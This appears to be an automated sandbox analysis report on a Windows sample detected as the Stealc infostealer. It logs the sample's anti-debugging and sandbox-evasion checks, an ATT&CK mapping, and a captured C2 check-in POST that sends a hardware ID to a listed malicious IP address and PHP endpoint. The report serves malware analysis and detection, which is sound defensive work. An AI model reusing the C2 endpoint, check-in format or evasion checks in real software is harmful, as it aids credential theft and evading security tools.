                Source: file.exe, file.exe, 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1749682268.00000000013F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1749682268.0000000001428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13608
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13611
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13628
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13623
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13662
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC45C0 VirtualProtect ?,00000004,00000100,000000000_2_00BC45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BD9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD9750 mov eax, dword ptr fs:[00000030h]0_2_00BD9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00BD78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1748, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00BD9600
                Source: file.exe, file.exe, 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: hProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00BD7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00BD7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00BD7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00BD7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.bc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1706643703.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1748, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.bc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1706643703.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1748, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/(17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php#19%VirustotalBrowse
                http://185.215.113.37//21%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php;17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpl17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpC17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpg17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phplfile.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37//file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.php;file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37file.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/(file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.php#file.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpCfile.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37Rfile.exe, 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpgfile.exe, 00000000.00000002.1749682268.0000000001407000.00000004.00000020.00020000.00000000.sdmptrueunknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.37
                  		unknownPortugal
                  		206894WHOLESALECONNECTIONSNLtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1532474
                  Start date and time:2024-10-13 10:38:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 4s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:1
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 80%
                  • Number of executed functions: 19
                  • Number of non-executed functions: 89
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Stop behavior analysis, all processes terminated

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.949219295528777
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'781'760 bytes
                  MD5:8008a506f397dc8e845a8b9bc62bded1
                  SHA1:df3448212221cdab90c8f4468b4b61ec4e5a408b
                  SHA256:541cd6146cb146b9700ea311b06ee7079a3818dc1dbac4f833c2b90ca17ce8d0
                  SHA512:be4ee8daae90c8560fac5656e16898cfc8f95518559fb2d9d90839f427a5b275a32ab3d79befcaa698791a7d33df76738ed74d98545d560c705f97c415b6f69e
                  SSDEEP:24576:Oqk6pMv3YuN778IMCbFNdBp0QwzpAwJr8qWxcZDtwULw4VAPTBJNwlRpTquXxP94:OU03Yc8qzYnA5qWMDGkzVA77yRZchtW
                  TLSH:1A85330F3FDB8A7EC0C58A3894A6F0182D711AAF977E2F2117CE37515497D9CC2AA446
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                  File Icon

                  Icon Hash:90cececece8e8eb0

                  Static PE Info

                  General

                  Entrypoint:0xa75000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                  Entrypoint Preview

                  Instruction
                  jmp 00007F230C7F560Ah
                  femms
                  sbb eax, dword ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  jmp 00007F230C7F7605h
                  add byte ptr [esi], al
                  or al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], dh
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], ch
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [esi], al
                  or al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [ecx], al
                  add byte ptr [eax], 00000000h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  adc byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add ecx, dword ptr [edx]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Rich Headers

                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [LNK] VS2010 build 30319

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  0x10000x25b0000x22800c89a206633f5f1943353b626bdbdfbadunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  0x25e0000x2890000x200d300744783d513c4880732f60354ed5cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  rwxwlxgf0x4e70000x18d0000x18ce00e362b097077e741f9b7aad30dac42a1aFalse0.9949040354330708data7.9545126546693545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  nitsrzzh0x6740000x10000x4003b14e3d2ec598e8247a2102137011f97False0.755859375data5.992076950799929IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant0x6750000x30000x2200adce5872e824febe0993dcae25e51e80False0.060317095588235295DOS executable (COM)0.8172702439019668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Imports

                  DLLImport
                  kernel32.dlllstrcpy

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-10-13T10:39:07.755961+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 13, 2024 10:39:06.730186939 CEST4973080192.168.2.4185.215.113.37
                  Oct 13, 2024 10:39:06.735266924 CEST8049730185.215.113.37192.168.2.4
                  Oct 13, 2024 10:39:06.735361099 CEST4973080192.168.2.4185.215.113.37
                  Oct 13, 2024 10:39:06.735534906 CEST4973080192.168.2.4185.215.113.37
                  Oct 13, 2024 10:39:06.741138935 CEST8049730185.215.113.37192.168.2.4
                  Oct 13, 2024 10:39:07.504170895 CEST8049730185.215.113.37192.168.2.4
                  Oct 13, 2024 10:39:07.504312038 CEST4973080192.168.2.4185.215.113.37
                  Oct 13, 2024 10:39:07.515191078 CEST4973080192.168.2.4185.215.113.37
                  Oct 13, 2024 10:39:07.520083904 CEST8049730185.215.113.37192.168.2.4
                  Oct 13, 2024 10:39:07.755872011 CEST8049730185.215.113.37192.168.2.4
                  Oct 13, 2024 10:39:07.755960941 CEST4973080192.168.2.4185.215.113.37
                  Oct 13, 2024 10:39:10.196985960 CEST4973080192.168.2.4185.215.113.37

                  HTTP Request Dependency Graph

                  • 185.215.113.37

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449730185.215.113.37801748C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Oct 13, 2024 10:39:06.735534906 CEST89OUTGET / HTTP/1.1
                  Host: 185.215.113.37
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Oct 13, 2024 10:39:07.504170895 CEST203INHTTP/1.1 200 OK
                  Date: Sun, 13 Oct 2024 08:39:07 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 0
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Oct 13, 2024 10:39:07.515191078 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHII
                  Host: 185.215.113.37
                  Content-Length: 211
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 38 30 42 30 44 31 33 36 41 41 31 31 30 36 36 35 34 35 34 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 2d 2d 0d 0a
                  Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="hwid"2580B0D136AA1106654546------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="build"doma------AECAKECAEGDHIECBGHII--
                  Oct 13, 2024 10:39:07.755872011 CEST210INHTTP/1.1 200 OK
                  Date: Sun, 13 Oct 2024 08:39:07 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 8
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 59 6d 78 76 59 32 73 3d
                  Data Ascii: YmxvY2s=


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  System Behavior

                  General

                  Target ID:0
                  Start time:04:39:02
                  Start date:13/10/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0xbc0000
                  File size:1'781'760 bytes
                  MD5 hash:8008A506F397DC8E845A8B9BC62BDED1
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1749682268.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1706643703.0000000005060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:10.1%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:24
